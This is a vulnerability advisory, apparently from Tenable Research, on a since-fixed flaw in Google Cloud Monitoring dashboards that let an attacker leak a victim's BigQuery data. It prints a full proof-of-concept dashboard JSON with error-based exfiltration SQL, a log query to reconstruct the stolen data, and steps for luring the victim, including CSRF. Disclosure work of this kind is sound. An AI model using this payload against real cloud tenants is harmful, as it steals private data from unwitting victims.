Synopsis
Tenable Research has identified and responsibly disclosed a data exfiltration vulnerability in Google Cloud Monitoring. This flaw allowed an attacker to leak sensitive data from a victim's BigQuery datasets by abusing the Observability Analytics widget in custom dashboards.
Cloud Monitoring dashboards are executed automatically when browsing, and the widgets are executed with the viewer’s permissions. An attacker could create a dashboard containing Observability Analytics widgets configured with malicious SQL queries. These queries were designed to raise errors based on data in datasets in other Google Cloud tenants (the victim’s project) for which the attacker had no permissions. The attacker could then grant the victim permissions to the dashboard. When the viewer browses to the dashboard, the queries will run, and the victim’s private BigQuery data will be exfiltrated to the attacker’s project logs.
Proof of Concept:
- Make sure Log Analytics is active and that at least one log view is available
- Give the victim’s principal IAM permissions in the attacker’s tenant
- Create a custom Cloud Monitoring dashboard
- Add an Observability Analytics widget with any valid query, choosing the BigQuery engine in the settings
- Use the JSON editor to insert a malicious JSON
{
"displayName": "ExfilTest",
"dashboardFilters": [],
"mosaicLayout": {
"columns": 48,
"tiles": [
{
"height": 1,
"width": 1,
"widget": {
"title": "offset0",
"id": "",
"timeSeriesTable": {
"columnSettings": [],
"dataSets": [
{
"tableTemplate": "",
"timeSeriesQuery": {
"opsAnalyticsQuery": {
"queryExecutionRules": {
"useReservedSlots": true
},
"queryHandle": "[QUERY_HANDLE]",
"savedQueryId": "",
"sql": "SELECT\n ERROR(CONCAT('offset0: ', TO_BASE64(\n CAST(\n TO_JSON_STRING(ARRAY_AGG(t)) AS BYTES\n ))\n ))\nFROM (\n SELECT t\n FROM\n `[ATTACKER_LOGVIEW]` AS l\n CROSS JOIN `[VICTIM_DATASET]` AS t\n LIMIT 1 OFFSET 0\n);\n"
},
"outputFullDuration": false,
"unitOverride": ""
}
}
],
"displayColumnType": false,
"metricVisualization": "NUMBER"
}
}
},
{
"xPos": 2,
"height": 1,
"width": 1,
"widget": {
"title": "offset1",
"id": "",
"timeSeriesTable": {
"columnSettings": [],
"dataSets": [
{
"tableTemplate": "",
"timeSeriesQuery": {
"opsAnalyticsQuery": {
"queryExecutionRules": {
"useReservedSlots": true
},
"queryHandle": "[QUERY_HANDLE]",
"savedQueryId": "",
"sql": "SELECT\n ERROR(CONCAT('offset0: ', TO_BASE64(\n CAST(\n TO_JSON_STRING(ARRAY_AGG(t)) AS BYTES\n ))\n ))\nFROM (\n SELECT t\n FROM\n `[ATTACKER_LOGVIEW]` AS l\n CROSS JOIN `[VICTIM_DATASET]` AS t\n LIMIT 1 OFFSET 1\n);\n"
},
"outputFullDuration": false,
"unitOverride": ""
}
}
],
"displayColumnType": false,
"metricVisualization": "NUMBER"
}
}
}
]
}
}
- Apply Changes, you should see widgets that don’t run due to a lack of permissions
- Share the dashboard with the victim and wait for them to click on the email, or get them to browse to the URL some other way, such as CSRF
- Once the victim views the dashboard, query the logs to reconstruct the data
SELECT CAST( FROM_BASE64( REGEXP_EXTRACT( -- grab the base64 run after the word `offset` proto_payload.audit_log.status.message, r'^offset\d+:\s+([A-Za-z0-9+/=]+)' ) ) AS STRING ) FROM `[ATTACKER_LOGVIEW]` WHERE severity = "ERROR" AND starts_with(proto_payload.audit_log.status.message, 'offset') ORDER BY timestamp DESC
Solution
Google has resolved the issue by stopping auto run of log analytics queries. Queries involving resources which do not share an ownership boundary and a custom dashboard will now display a warning message to ask users to check if the query is safe, and manually initiate running the query in charts, once confirmed.
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team